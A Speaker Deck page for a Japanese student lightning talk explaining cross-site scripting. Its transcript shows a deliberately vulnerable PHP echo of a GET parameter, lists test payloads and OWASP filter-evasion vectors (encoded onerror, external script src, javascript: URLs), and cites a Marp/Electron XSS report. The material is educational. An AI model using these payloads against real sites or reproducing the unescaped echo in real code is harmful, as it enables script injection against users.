Upgrade to Pro — share decks privately, control downloads, hide ads and more …

XSSの入力値を調べてみた / searching xss insertion value

49116ff34041caf0476b170ab193ebc5?s=47 Tomoyuki KOYAMA
February 03, 2018
Technology
3
1.2k

XSSの入力値を調べてみた / searching xss insertion value

2018/02/03 学生LT at freee

49116ff34041caf0476b170ab193ebc5?s=128

Tomoyuki KOYAMA

February 03, 2018
Tweet

More Decks by Tomoyuki KOYAMA

See All by Tomoyuki KOYAMA
Distributed Log Search Based on Time Series Access and Service Relations
49116ff34041caf0476b170ab193ebc5?s=48 tomoyk
0
25
Webアプリを動かすまでのインフラ構築 / infra-build-for-web-app
49116ff34041caf0476b170ab193ebc5?s=48 tomoyk
0
180
コンピュータが大好きな私が大学院進学した理由 / Why I chose graduate school
49116ff34041caf0476b170ab193ebc5?s=48 tomoyk
2
350
この先生きのこるための学び方 / how-to-learn-tech
49116ff34041caf0476b170ab193ebc5?s=48 tomoyk
1
230
佐川急便のフィッシングサイトを調べてみた / Analysis of sagawa fishing site
49116ff34041caf0476b170ab193ebc5?s=48 tomoyk
1
90
既存のWebアプリをセキュアにするためにやったこと / Student-LT-WebSec
49116ff34041caf0476b170ab193ebc5?s=48 tomoyk
0
96
パケットを覗いてみよう / Packet workshop for beginners
49116ff34041caf0476b170ab193ebc5?s=48 tomoyk
0
200
ブレース展開のススメ
49116ff34041caf0476b170ab193ebc5?s=48 tomoyk
0
310
スマートフォンにおける気象データの可視化 / Visualization of the weather data for the smartphone
49116ff34041caf0476b170ab193ebc5?s=48 tomoyk
0
29

Other Decks in Technology

See All in Technology
eBPFで実現するコンテナランタイムセキュリティ / Container Runtime Security with eBPF
2f73f93f91c4401b0baf12029226a681?s=48 tobachi
PRO
5
1.5k
Microsoft Data Analytics trends : ”Lakehouse” , ”Data Mesh"
0d7a3b61c5c1f64a50136cf4bb5702b7?s=48 ryomaru0825
2
110
金融スタートアップの上場準備で大事にしたマインドセット / 2022-08-04-the-mindset-in-preparing-for-ipo
0251532f4fb413ea1a026efe6eb16b87?s=48 stajima
0
300
AWSで実現する「好き」の感情 / Develop Suki by AWS #devio2022
1e72c797afb9bab65655a1eb7d183460?s=48 syobochim
1
240
ソフトバンクのシナジーがもたらすクラウドソリューションについて、クラウドエンジニアが話してみた。
61c616e83bef28a1cd2666439ebf334b?s=48 sbtechnight
0
290
Power Automate for desktopで 配信環境を改善してみた話
C97407daeb9ad3a654e6a0ad8701b972?s=48 akiika
0
210
OpenShiftのサポートを始めるぞ!高頻度で更新されるOSSを効果的にキャッチアップする仕組みを考えました!
4cb5b950cfd0eabf5d6b828c951d4549?s=48 loftkun
0
320
塩漬けにしているMySQL 8.0.xxをバージョンアップしたくなる、ここ数年でのMySQL 8.0の改善点 / MySQL Update 202208
7fb060398b26ed622d34921bd64e4f5d?s=48 yoshiakiyamasaki
1
570
CloudWatchアラームによるサービス継続のための監視入門 / Introduction to Monitoring for Service Continuity with CloudWatch Alarms
107ea34bd4da51e40f1c30b9ca0c459e?s=48 inomasosan
1
400
psql, my favorite tool!
18749909c147a9ee98f6b112911943cc?s=48 nuko_yokohama
1
180
EC/CRMの自社サービス開発をマネジメントするようになって1年でやってきたこととこれから / devio2022-takano-sho-road-to-good-development-team-management
Fee058832252e72722b8b03073ff6324?s=48 masaru_b_cl
0
370
20220803投資先CXO候補者向け 会社紹介資料_合同会社BLUEPRINT
08b07f5e5f554c4f4a6a30ef1cca28ad?s=48 hik
0
160

Featured

See All Featured
Rebuilding a faster, lazier Slack
C0b42577cfc2b321be3474618107e933?s=48 samanthasiow
62
7.3k
Keith and Marios Guide to Fast Websites
E14f55d3f939977cecbf51b64ff6f861?s=48 keithpitt
404
21k
Building Adaptive Systems
06f8b41980eb4c577fa40c41d5030c19?s=48 keathley
25
1.1k
Navigating Team Friction
245cee81a9c424266e5e401d844ea881?s=48 lara
175
11k
The Invisible Side of Design
B3d6434763caa0ef5dc4b792662c49f7?s=48 smashingmag
290
48k
The Success of Rails: Ensuring Growth for the Next 100 Years
C44e1f7e22c3f23cff7bc130871047ef?s=48 eileencodes
14
3.8k
Visualization
170b760e0147792d0140e59ec78e9893?s=48 eitanlees
125
12k
Visualizing Your Data: Incorporating Mongo into Loggly Infrastructure
D8fc2580cfaca035f666d9e4ee79a7f7?s=48 mongodb
29
4.4k
Why Our Code Smells
20bfe76b3d6105641f879fe45cfc9272?s=48 bkeepers
PRO
324
55k
Teambox: Starting and Learning
Aebc2d07a50011e2a30d38435fde564a?s=48 jrom
123
7.7k
How to train your dragon (web standard)
053e75a5b48b44d6dd0612795dfb326d?s=48 notwaldorf
60
3.9k
The Invisible Customer
4262b9cfacfb6b2c77f23e1d0310cd3e?s=48 myddelton
110
11k

Transcript

  1. XSS

  2. B1 Twitter: @tmyk_kym : https://blog.koyama.me/ : Network/Web/Server/Security : PyCon JP,

    Seccamp, etc

  3. XSS (Cross Site Scripting) HTML CWE-79: Improper Neutralization of Input

    During Web Page Generation ('Cross-site Scripting') (3.0)

  4. ... <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><?php echo $_GET['mode'];

    ?></h1> $_GET['mode'] hello <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1>hello</h1>

  5. ... <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><?php echo $_GET['mode'];

    ?></h1> $_GET['mode'] <script>alert()</script> <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><script>alert()</script></h1>

  6. XSS Stored XSS( ) Re ected XSS( ) DOM Based

    XSS

  7. XSS == XSS

  8. <script>alert(1)</script> "><script>alert(1)</script> " onmouseover="alert(1) x" onerror="alert(1) <- img src javascript:alert(1)

    <- a href

  9. XSS

  10. ? / . XSS . XSS .

  11. ?

  12. OWASP OWASP XSS 2015 XSS - OWASP https://jpcertcc.github.io/OWASPdocuments/CheatSheets/XSSFilterEvasion.html

  13. ( ) 3

  14. [1] <SCRIPT/XSS SRC="http://example.com/xss.js"> </SCRIPT> / . ... <script xss="" src="http://example.com/xss.js">

    </script>

  15. [2] <<SCRIPT>alert("XSS");//<</SCRIPT> HTML XSS . ... "><script> alert("XSS");//< </script>

  16. [3] <img src=x onerror=&#x6A&#x61&#x76&#x61&#x73 &#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65 &#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> &#x... HTML (16 )

    . ... <img src="x" onerror="javascript:alert('XSS')">

  17. ( )

  18. ( ) <img src=javascript:alert('XSS')> <img src=javascript: alert(String.fromCharCode(88,83,83))> <META HTTP-EQUIV="refresh" CONTENT="3;

    URL=http://;URL=http://yahoo.co.jp/;">
  19. None

  20. Electron Marp Electron Web ... <script>alert()</script> alert ...( )

  21. ?

  22. JVN#21174546: Marp JavaScript https://jvn.jp/jp/JVN21174546/ However, sanitizing inline script should consider

    on future. [Security issue] Remote script can read user local resource · Issue #187 · yhatt/marp “ “

  23. XSS XSS alert() Electron